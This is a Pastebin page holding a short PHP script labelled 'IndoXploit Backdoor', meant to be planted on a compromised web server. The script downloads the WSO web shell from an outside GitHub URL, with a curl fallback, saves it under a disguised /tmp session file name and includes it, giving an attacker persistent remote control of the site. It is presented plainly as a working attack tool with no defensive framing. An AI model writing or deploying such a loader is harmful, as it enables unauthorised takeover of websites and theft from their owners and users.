Hasannetbd

IDX WSO

Mar 3rd, 2018
148
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.73 KB | None | 0 0
  1. <?
  2. # IndoXploit Backdoor
  3. # Bypass 406 Not Acceptable & Auto Delete Shell
  4. # Coded by: L0c4lh34rtz - IndoXploit
  5.  
  6. $URL = 'https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso-4.2.0.php'; # Backdoor URL
  7. $TMP = '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'; # dont change this !!
  8.  
  9. function M() {
  10.     $FGT = @file_get_contents($GLOBALS['URL']);
  11.     if(!$FGT) {
  12.         echo `curl -k $(echo {$GLOBALS['URL']} | base64 -d) > {$GLOBALS['TMP']}`;
  13.     } else {
  14.         $HANDLE = fopen($GLOBALS['TMP'], 'w');
  15.         fwrite($HANDLE, $FGT);
  16.         fclose($HANDLE);
  17.     }
  18.     echo '<script>window.location="?hasan";</script>';
  19. }
  20.  
  21. if(file_exists($TMP)) {
  22.     if(filesize($TMP) === 0) {
  23.         unlink($TMP);
  24.         M();
  25.     } else {
  26.         include($TMP);
  27.     }
  28. } else {
  29.     M();
  30. }
  31. ?>
Add Comment
Please, Sign In to add comment